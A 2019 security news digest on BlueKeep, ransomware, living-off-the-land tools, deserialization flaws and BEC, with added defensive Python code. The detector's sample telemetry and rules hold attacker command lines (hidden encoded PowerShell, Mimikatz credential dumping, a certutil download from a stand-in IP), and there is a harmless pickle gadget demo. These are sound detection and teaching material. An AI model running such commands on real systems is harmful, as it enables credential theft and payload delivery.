On May 14, 2019, Microsoft released patches for BlueKeep (CVE-2019-0708), a pre-authentication flaw in Remote Desktop Services, and described it as a “wormable vulnerability that could self-propagate similarly to how the EternalBlue helped propagate the WannaCry ransomware outbreak.” On Tuesday, July 23, 2019, Immunity, Inc. announced that it was shipping a working BlueKeep exploit in CANVAS 7.23, the company’s commercial penetration-testing toolkit. Microsoft, the US National Security Agency (NSA), Germany’s BSI, the Australian Cyber Security Centre, the US Department of Homeland Security, and the UK’s National Cyber Security Centre have all issued alerts urging users to patch the affected older versions of Windows. Organizations that have not yet patched should do so as soon as possible; where patching is delayed, enabling Network Level Authentication (NLA) on RDP and blocking TCP 3389 at the perimeter reduce exposure, since NLA requires a valid login before the vulnerable code path is reached.
On July 16, 2019, cloud hosting provider iNSYNQ took its network offline after a ransomware attack that left customers unable to reach their hosted accounting data. “The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible,” the company said. “As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment.” With ransomware attacks on the rise, organizations should verify and test both preventive controls (patching, least privilege, offline backups) and detective controls, and maintain a tested incident response plan so that containment decisions like the one iNSYNQ had to make are not improvised under pressure.
Cybercriminals have long used legitimate tools and utilities for malicious ends, but Positive Technologies recently reported a substantial increase in “living-off-the-land” tactics. The appeal is simple: activity generated by administrative tools that are already present and already trusted blends into normal traffic and normal process telemetry, leaving signature-based controls little to key on. “Threat actors increasingly leverage dual-use tools or tools that are already preinstalled on targeted systems to carry out cyberattacks,” Fortinet said. The eight most commonly abused tools are Cobalt Strike and Metasploit Pro, PowerShell, Windows Sysinternals, VNC, Windows Management Instrumentation (WMI), Mimikatz, TeamViewer, and trusted system executables. Because the binaries themselves are legitimate, detection has to focus on how they are invoked (command-line arguments, parent process, network destination) rather than on their mere presence.
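The point about detecting invocation rather than presence is easiest to see against telemetry. The following is an added example, not code from Positive Technologies, Fortinet or any product named above: a small rule set run over constructed, Sysmon-like process-creation events. The flat `key=value|key=value` line format, the event lines, the hostname FS01 and the IP 203.0.113.9 are all constructed; the rules cover only a subset of the eight tools and are meant to be extended.

```python
"""Flag living-off-the-land tool abuse in process-creation telemetry.

Added example, not code from any vendor quoted in the text. The event lines and
the flat "key=value|key=value" format are constructed to resemble Sysmon event 1
(process creation); the rule set is an illustrative subset covering the tools
named in the text.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    record_id: int
    tool: str
    reason: str


# Rules key on *how* a tool is invoked, not on its mere presence, so routine
# administration (a signed script run with -File, a local WMI query) stays quiet.
RULES = [
    ("PowerShell",
     re.compile(r"powershell(\.exe)?\b.*?(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
                r"|-w(indowstyle)?\s+hidden|downloadstring|invoke-expression|\biex\b)", re.I),
     "encoded, hidden or download-and-execute PowerShell"),
    ("WMI",
     re.compile(r"wmic(\.exe)?\b.*?(/node:|process\s+call\s+create)", re.I),
     "WMI used to spawn a process, possibly on a remote host"),
    ("Sysinternals",
     re.compile(r"\bpsexec(\.exe)?\b|\bprocdump(\.exe)?\b.*?\blsass\b", re.I),
     "PsExec lateral movement or lsass memory dump"),
    ("Mimikatz",
     re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I),
     "Mimikatz module invoked on the command line"),
    ("Trusted executables",
     re.compile(r"certutil(\.exe)?\b.*?-urlcache|mshta(\.exe)?\b.*?https?://"
                r"|regsvr32(\.exe)?\b.*?/i:https?://", re.I),
     "signed Windows binary used to fetch or run remote content"),
]


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value|key=value' event line into a dict."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    fields["EventID"] = int(fields.get("EventID", 0))
    fields["RecordID"] = int(fields.get("RecordID", 0))
    return fields


def detect(events) -> list:
    """Return one Finding per (event, rule) match over process-creation events."""
    findings = []
    for line in events:
        ev = parse_event(line)
        if ev["EventID"] != 1:          # only process creation is relevant here
            continue
        # Match image path and command line together: tools get renamed, and the
        # image name alone says nothing about intent.
        haystack = f'{ev.get("Image", "")} {ev.get("CommandLine", "")}'
        for tool, pattern, reason in RULES:
            if pattern.search(haystack):
                findings.append(Finding(ev["RecordID"], tool, reason))
    return findings


# Constructed sample telemetry (not real logs); record 103 is a benign baseline
# and record 105 is a network event that the detector must ignore.
SAMPLE_EVENTS = [
    r"EventID=1|RecordID=101|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r"EventID=1|RecordID=102|Image=C:\Windows\System32\wbem\WMIC.exe"
    r'|CommandLine=wmic /node:FS01 process call create "cmd.exe /c whoami"',
    r"EventID=1|RecordID=103|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -ExecutionPolicy AllSigned -File C:\scripts\backup.ps1",
    r"EventID=1|RecordID=104|Image=C:\Tools\mimikatz.exe"
    r'|CommandLine=mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
    r"EventID=3|RecordID=105|Image=C:\Windows\System32\svchost.exe|DestinationIp=10.0.0.5",
    r"EventID=1|RecordID=106|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil.exe -urlcache -split -f http://203.0.113.9/a.txt a.exe",
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.tool}: {f.reason}")
```

Run as a script it reports records 101, 102, 104 and 106 and stays silent on the signed backup script, which is the property worth preserving when you extend the rules: every pattern should describe an abuse, not a binary.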
Koadic, a post-exploitation tool that nation-state teams from Iran, Russia, and China have used to evade detection, was recently updated with features that let attacks spread and persist more efficiently. The tool was released at DEF CON two years earlier by its creator, Sean Dillon. The updates allow it to enumerate a target’s environment, spread through the network, and scrape credentials. “It’s much more efficient now. It can be used to compromise entire networks in a matter of minutes,” Dillon said. The new version was demonstrated at Black Hat USA Arsenal in Las Vegas. Because Koadic runs its implants through the Windows scripting hosts rather than dropping a conventional executable, organizations should make sure behavior-based detection (script block logging, process-tree and command-line monitoring) is enabled rather than relying on file-based scanning alone.
Ransomware recently hit three managed service providers (MSPs) after attackers obtained access to the tools the MSPs use to remotely monitor and manage client systems. The two products involved were the Webroot management console and Kaseya VSA, both of which were then used to push the ransomware to client endpoints. The vendors disclosed that stolen credentials were likely used to reach their tools at the MSPs. What isn't clear is how the attackers obtained the Webroot console credentials. Kyle Hanslovan of Huntress Labs said, 'We've yet to see anything that would suggest the issue is a global Webroot vulnerability.' John Durant, CTO at Kaseya, said, 'We continue to urge customers to employ best practices around securing their credentials, regularly rotating passwords, and strengthening their security hygiene.' The practical lesson for MSPs is that an RMM or endpoint-security console is a mass-deployment tool for whoever holds the credentials, so those accounts need multi-factor authentication and login monitoring before anything else.
Tavis Ormandy of Google Project Zero found a denial-of-service vulnerability in Microsoft's SymCrypt, the core cryptographic library used by Windows. He demonstrated it with a specially crafted X.509 certificate whose signature verification never completes. 'The vulnerability could cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric,' Ormandy said. Because any Windows component that verifies such a certificate (TLS servers, IPsec, code signing, S/MIME) would hang, a single malicious certificate can take down a service. There is currently no patch, but Microsoft has said the fix will ship in the July security updates.
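The failure class Ormandy describes, a modular-inverse routine that does not return on some inputs, is easiest to understand next to one that is guaranteed to return. The following is an added example and is not SymCrypt's code or algorithm: an extended Euclidean inverse whose loop is bounded by construction, with non-invertible input reported instead of looped on. The Montgomery set-up at the end is an assumption about where certificate-supplied numbers typically reach a modular inverse (the RSA modulus in a certificate is attacker-chosen, and an even modulus has no inverse modulo a power of two); it is not a claim about the SymCrypt bug's trigger.

```python
"""Modular inverse with guaranteed termination and explicit rejection of bad input.

Added example illustrating the failure class in the SymCrypt report. This is
independent code, not SymCrypt's algorithm; the Montgomery set-up is one
plausible place where certificate-supplied numbers reach a modular inverse and
is used here as an assumption.
"""


class NotInvertible(ValueError):
    """a has no inverse modulo m (gcd(a, m) != 1)."""


def mod_inverse(a: int, m: int) -> int:
    """Return x in [1, m) with (a * x) % m == 1, via the extended Euclidean algorithm.

    Each iteration strictly reduces the remainder, so the loop takes at most about
    1.5 * m.bit_length() steps (Lame's bound). The step budget makes that invariant
    explicit: if it were ever violated the function raises rather than spins, and a
    non-invertible input is reported instead of being looped on.
    """
    if m <= 1:
        raise ValueError("modulus must be greater than 1")
    a %= m
    if a == 0:
        raise NotInvertible("0 has no inverse")
    old_r, r = a, m
    old_s, s = 1, 0
    budget = 2 * m.bit_length() + 2      # comfortably above the Lame bound
    while r != 0:
        if budget == 0:
            raise RuntimeError("modular inverse did not converge; input rejected")
        budget -= 1
        q = old_r // r
        old_r, r = r, old_r - q * r      # remainders shrink strictly
        old_s, s = s, old_s - q * s      # Bezout coefficient of a
    if old_r != 1:
        raise NotInvertible(f"gcd(a, m) = {old_r}, no inverse exists")
    return old_s % m


def is_invertible(a: int, m: int) -> bool:
    try:
        mod_inverse(a, m)
        return True
    except NotInvertible:
        return False


def montgomery_n_prime(n: int, word_bits: int = 64) -> int:
    """n' = -n^-1 mod 2^word_bits, the constant Montgomery reduction precomputes.

    An RSA modulus taken from a certificate is attacker-chosen. An even modulus has
    no inverse modulo a power of two, so a routine that assumes invertibility here
    is exactly the kind that can misbehave on particular bit patterns.
    """
    R = 1 << word_bits
    return (-mod_inverse(n, R)) % R


def montgomery_constant_ok(n: int, word_bits: int = 64) -> bool:
    """Check the defining identity n * n' + 1 == 0 (mod 2^word_bits)."""
    R = 1 << word_bits
    return (n * montgomery_n_prime(n, word_bits) + 1) % R == 0


if __name__ == "__main__":
    print(mod_inverse(17, 3120))                        # 2753
    print(is_invertible(2**64 - 60, 2**64))             # False: even modulus rejected
    print(montgomery_constant_ok(0xC0FFEE_DEADBEEF_1))  # True for any odd n
```

The design point is that termination is not left to the arithmetic alone: the budget is a cheap second line of defence, and every "cannot happen" branch raises, which is what you want in a library that parses hostile certificates.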
Zelle, the peer-to-peer payment service embedded in many banking apps, is being abused by attackers to drain personal checking and savings accounts. The attacker attempts to log in to the victim's account, which causes a one-time Zelle authorization code to be sent to the victim, then places a spoofed call that appears to come from the victim's bank and talks the victim into reading that code back. The code completes the attacker's login. What makes Zelle attractive to attackers is that it is wired directly into the banking app and the underlying account, so a successful login gives immediate access to funds rather than to a separate wallet.
Michael McGuire, a criminology professor at the University of Surrey, posed as a buyer on the dark web and found organized crime groups selling unauthorized network access to financial organizations. One group was selling fraudulent web pages imitating Bank of America that let the buyer phish customers and harvest their data; the toolkit and tutorial cost $11. Other companies being targeted include AT&T and Verizon. McGuire said, "if they were not already doing so, corporate cybersecurity teams ought to spend time monitoring the dark web to pick up signs of potential threats, such as data from their organizations already for sale or rogue employees willing to sell network access to others."
Cybercrime against the financial sector is as prominent as it has ever been and continues to grow. Financial institutions face adversaries ranging from individuals to nation-states, whose methods are increasingly damaging and increasingly well timed. Attackers will wait for an organization to launch a new program or service that has not been thoroughly vetted for security and use it to gain a foothold in the victim's environment. As new technologies emerge and banking continues to move online, institutions should keep security at the forefront of every initiative, and in particular should threat-model new customer-facing services before launch, since that launch window is precisely what attackers watch for.
Law enforcement agencies from six countries (Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States) worked together to dismantle the group behind the GozNym banking malware and arrest several of its members. GozNym, a hybrid of the Gozi ISFB banking trojan and the Nymaim dropper, was used to steal over $100 million from more than 41,000 victims, predominantly in the United States and Europe. Earlier this month a U.S. federal indictment charged the defendants with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering.
Relevant URL(s): https://thehackernews.com/2019/05/GozNym-banking-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18do
Thrangrycat, a newly disclosed vulnerability in Cisco routers, switches, and firewalls, lets an attacker install a persistent backdoor. Tracked as CVE-2019-1649 and discovered by researchers at Red Balloon Security, it affects Cisco enterprise products that implement the Trust Anchor module (TAm), the hardware root of trust Cisco uses to verify that the firmware running on the platform is authentic and unmodified. The flaw lies in how the TAm's FPGA bitstream is stored and loaded, so an attacker who already has root on the device can alter the root of trust itself. "By chaining Thrangrycat and remote command injection vulnerabilities, an attacker can remotely and persistently bypass Cisco's secure boot mechanism and lock out all future software updates to the TAm," the researchers said. Because a compromised TAm will happily report a compromised image as genuine, boot-time attestation from the device cannot be used to confirm that an affected unit is clean. Further details are expected at Black Hat USA this August.
Relevant URL(s): https://thehackernews.com/2019/05/cisco-secure-boot-bypass.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1986.nk0ao093p4.18av
Earlier this month, researchers disclosed a vulnerability class affecting most modern Intel processors, including those used in Apple Macs. Microarchitectural Data Sampling (MDS) is a family of four speculative-execution side-channel flaws that let an attacker sample data in flight through CPU-internal buffers (store buffers, fill buffers, and load ports), leaking secrets belonging to other processes, the kernel, or other virtual machines on the same core. A well-executed attack could recover material such as disk-encryption keys and user passwords. Intel has released microcode updates (MCU) for MDS; these must be paired with operating-system updates that flush the affected buffers on privilege transitions, and full mitigation on affected parts also requires disabling Hyper-Threading. Users are urged to apply the updates as soon as possible.
Relevant URL(s): https://thehackernews.com/2019/05/intel-processor-vulnerabilities.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18e0
Financial organizations are having to balance security and usability as they work to maintain and strengthen consumer trust. Open banking has created a shift: organizations now have an ecosystem of partners whose security they must also assure. “Security is only as good as the weakest link in the network of ecosystem partners, and the global trend toward open banking is increasing the spiderweb of interconnectivity among banks and third parties — creating additional points of weakness and vulnerability in banks’ network security,” said Alan McIntyre, global head of Accenture’s Banking practice. As open banking continues to grow and evolve, financial organizations should verify a potential partner's security before granting it access to organizational data, and should scope that access (which APIs, which customers, which data fields) as narrowly as the service allows.
All versions of Oracle WebLogic Server are exposed to an unauthenticated remote code execution flaw in the wls9_async_response and wls-wsat web service components, where a crafted request reaches an insecure deserialization. At the time of writing no CVE had been assigned and the flaw was being tracked as CNVD-C-2019-48814 (it has since been assigned CVE-2019-2725, and Oracle has released an out-of-band patch); Oracle had been notified. Tens of thousands of WebLogic servers are reachable from the internet, most in the US and China, and they are attractive to attackers as hosts for covert crypto-mining. Until patched, administrators are urged to delete wls9_async_response.war and wls-wsat.war and restart WebLogic, or to block the /_async/* and /wls-wsat/* URL paths with access policy control in front of the server. Removing the WAR files is the more reliable of the two, since path-based blocking only works if the proxy and WebLogic normalize URLs the same way.
Business email compromise (BEC) campaigns have been targeting HR and finance staff to change direct-deposit details and redirect funds to throwaway accounts controlled by the criminals. BEC is cheap to run and can produce fast, lucrative results. The current trend is for the attacker to spoof an email from a senior executive and pressure a more junior employee to move the money; the apparent seniority of the sender makes the request look both authentic and urgent. This is social engineering, and success depends on the victim's behavior rather than on any technical exploit, so defenses have to combine policy (out-of-band verification of any change to payment details, dual approval above a threshold) with technology (DMARC enforcement, flagging of external senders whose display name matches an internal executive). As Phil Reitinger, President and CEO of the Global Cyber Alliance, puts it, "If it's possible for someone to request a check to be cut for $5 Million to someone not in the system, you've got a problem."
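The technical half of that defense, flagging messages whose sender does not match the executive they claim to be, is small enough to show in full. The following is an added example and not code from Global Cyber Alliance or any product; the organization domain example.com, the one-entry executive directory, the keyword lists, the weights and the three messages are all constructed. It scores the display-name spoof, a typo-squatted sender domain, a Reply-To pointing elsewhere, and payment and urgency language.

```python
"""Score an inbound message for the display-name and domain tricks typical of BEC.

Added example, not code from Global Cyber Alliance or any product named in the
text. The organisation domain, executive directory, keyword lists, weights and the
three messages are constructed.
"""
import email
from email import policy
from email.utils import parseaddr

ORG_DOMAIN = "example.com"                           # assumption: the defended mail domain
EXECUTIVES = {"jane doe": "jane.doe@example.com"}    # constructed directory: name -> real address
PAYMENT_TERMS = ("wire", "direct deposit", "routing", "payroll", "invoice", "bank details")
URGENCY_TERMS = ("urgent", "today", "immediately", "asap", "in meetings", "can't talk")

WEIGHTS = {
    "display_name_spoof": 3,   # executive's name on an address that is not theirs
    "lookalike_domain": 3,     # sender domain within one edit of ours
    "replyto_mismatch": 2,     # replies routed to a different domain than From
    "payment_language": 1,
    "urgency_language": 1,
}
SUSPICIOUS_AT = 3              # any single strong signal is enough to hold the mail


def levenshtein(a: str, b: str) -> int:
    """Edit distance; used to catch typo-squatted sender domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def assess(raw_message: str) -> dict:
    """Return {'flags': set of reason codes, 'score': int, 'suspicious': bool}."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    name, addr = parseaddr(str(msg.get("From", "")))
    from_domain = _domain(addr)
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    body = msg.get_content() if not msg.is_multipart() else ""
    text = f"{msg.get('Subject', '')}\n{body}".lower()

    flags = set()
    known = EXECUTIVES.get(name.strip().lower())
    if known and addr.lower() != known:
        flags.add("display_name_spoof")
    if from_domain != ORG_DOMAIN and levenshtein(from_domain, ORG_DOMAIN) <= 1:
        flags.add("lookalike_domain")
    if reply_addr and _domain(reply_addr) != from_domain:
        flags.add("replyto_mismatch")
    if any(t in text for t in PAYMENT_TERMS):
        flags.add("payment_language")
    if any(t in text for t in URGENCY_TERMS):
        flags.add("urgency_language")

    score = sum(WEIGHTS[f] for f in flags)
    return {"flags": flags, "score": score, "suspicious": score >= SUSPICIOUS_AT}


# Constructed messages, not real mail.
SPOOFED_DISPLAY_NAME = """\
From: Jane Doe <jane.doe.ceo@gmail.com>
To: payroll@example.com
Subject: Urgent: update my direct deposit

I need my direct deposit moved to a new account today. I'm in meetings, just confirm by email.
"""

LOOKALIKE_DOMAIN = """\
From: Jane Doe <jane.doe@examp1e.com>
Reply-To: jdoe@protonmail.com
To: finance@example.com
Subject: Vendor payment

Please wire the attached invoice balance to the updated bank details below.
"""

LEGITIMATE = """\
From: Jane Doe <jane.doe@example.com>
To: payroll@example.com
Subject: Q3 invoice approvals

Please process the attached invoices on the usual schedule.
"""

if __name__ == "__main__":
    for label, raw in [("spoof", SPOOFED_DISPLAY_NAME), ("lookalike", LOOKALIKE_DOMAIN),
                       ("legit", LEGITIMATE)]:
        print(label, assess(raw))
```

The scoring is deliberately asymmetric: payment language on its own never holds a message, because finance staff receive invoices all day, but an executive's name on a webmail address does, because there is no legitimate reason for it. Feed the verdict into a quarantine or a banner, and keep the out-of-band verification policy in place for the messages this cannot see.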
A recent privilege-escalation flaw (CVE-2019-0211) in Apache HTTP Server 2.4.17 through 2.4.38 on Unix-like systems is fixed in 2.4.39. Code running inside an unprivileged worker process, such as a PHP script or CGI program belonging to a hosting customer, can tamper with the shared-memory scoreboard so that the root-owned parent process executes attacker-controlled code on the next graceful restart, which logrotate commonly triggers every day. In other words, anyone who can run a script under the web server user can become root. Proof-of-concept exploit code was withheld to give administrators time to deploy the update. Shared web-hosting providers, where untrusted tenants run code inside the same httpd, are urged to apply the fix immediately; all other Apache administrators should apply it as soon as possible.
Mobile applications are failing to protect user data because they lack basic security features. A recent study by Aite Group assessed application security by decompiling the apps back to readable source. That this was possible at all was the first finding, since application shielding (obfuscation and anti-tampering) is supposed to keep unauthorized parties from decompiling an app and running their own vulnerability assessment against it. The study noted a split between traditional financial institutions, known for their security but short on mobile development expertise, and newer online financial institutions that lack experience with regulatory requirements but know secure development practice. Nathan Wenzler, Senior Director of Cybersecurity at Moss Adams, is "adamant that a failure to improve mobile financial app security could have huge consequences for banks and financial services companies." Institutions are urged to review their DevSecOps practices so that security is at the forefront of all development, and to treat anything shipped inside the app binary (API keys, endpoints, certificate pins) as readable by an attacker.
Banks are racing to build out digital platforms, both to make it easier for consumers to adopt new payment types and to compete with emerging financial technology companies. The last couple of years have shown astounding growth in the use of mobile payment and banking applications. While this digital convergence streamlines the consumer experience, it must align with the goals and regulatory guidance of the financial institution. Risk management needs to be at the forefront of the development and deployment of mobile banking solutions to ensure company and customer data is secure. The features and capabilities of today's technology are advancing faster than the resources available to manage and complete the projects. Institutions should assess mobile development from the same risk perspective they would apply to any other system deployment, and plan for the influx of data that will need to be monitored.
The researcher known as polict found a new exploit against TCPDF, a widely used PHP library for generating PDFs, that relies on deserialization to 'unpack' attacker-supplied data into code that is then executed. The original flaw was fixed in September 2018, but polict found another route that uses injected markup in the document content to reach the deserialization step. He disclosed that flaw privately to the TCPDF developers, and it was fixed within a month. Users of TCPDF should make sure they are running version 6.2.22 or later; more generally, any PHP code that passes untrusted input to unserialize(), or to file functions that will follow a phar:// wrapper, has the same exposure.
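The underlying pattern, a deserializer that will instantiate or call whatever the byte stream names, is language-independent, and the fix is the same everywhere: never deserialize untrusted bytes with a general-purpose mechanism, or restrict it to an allow-list. The following is an added example and is not TCPDF's code or PHP at all: Python's pickle stands in for PHP's unserialize(), the "payload" only calls os.getcwd() so its execution is visible and harmless, and the allow-list entry for datetime.date is an assumption about what a legitimate record needs.

```python
"""Unsafe versus restricted deserialization, in Python as a stand-in for PHP.

Added example; this is not TCPDF's code and not PHP. Python's pickle plays the
role of PHP's unserialize(): both reconstruct objects from attacker-supplied
bytes and both will call code named in the stream. The payload here only calls
os.getcwd() so the effect is visible and harmless.
"""
import io
import os
import pickle
from datetime import date


class Payload:
    """Serializes to a stream that instructs the unpickler to call os.getcwd().

    Any importable callable could be named here; this is the deserialization
    gadget in miniature. The class never needs to exist on the receiving side.
    """
    def __reduce__(self):
        return (os.getcwd, ())


def craft_payload() -> bytes:
    return pickle.dumps(Payload())


def vulnerable_load(blob: bytes):
    """The anti-pattern: deserialize whatever arrived, gadgets included."""
    return pickle.loads(blob)


# Allow-list of the only globals a data blob may reference (assumption: records
# carry a date). Plain dicts, lists, strings and numbers need no global at all,
# so this list stays very short.
ALLOWED_GLOBALS = {("datetime", "date")}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup that is not explicitly allowed."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def hardened_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def payload_executes_under_vulnerable_load() -> bool:
    """True if the crafted stream ran os.getcwd() inside pickle.loads()."""
    return vulnerable_load(craft_payload()) == os.getcwd()


def payload_rejected_under_hardened_load() -> bool:
    try:
        hardened_load(craft_payload())
    except pickle.UnpicklingError:
        return True
    return False


def benign_roundtrip_ok() -> bool:
    """Legitimate data (a dict with a date) still loads under the allow-list."""
    record = {"user": "alice", "expires": date(2019, 7, 23), "roles": ["viewer"]}
    return hardened_load(pickle.dumps(record)) == record


if __name__ == "__main__":
    print("gadget ran under pickle.loads:", payload_executes_under_vulnerable_load())
    print("gadget blocked under allow-list:", payload_rejected_under_hardened_load())
    print("benign record survives:", benign_roundtrip_ok())
```

Note that the receiving side never imports or defines Payload; the stream itself names the callable, which is why "we don't have that class on the server" is not a defense. The allow-list works because find_class is consulted for every global the stream references; the equivalent in PHP is the allowed_classes option of unserialize(), and the better answer in both languages is a data-only format such as JSON.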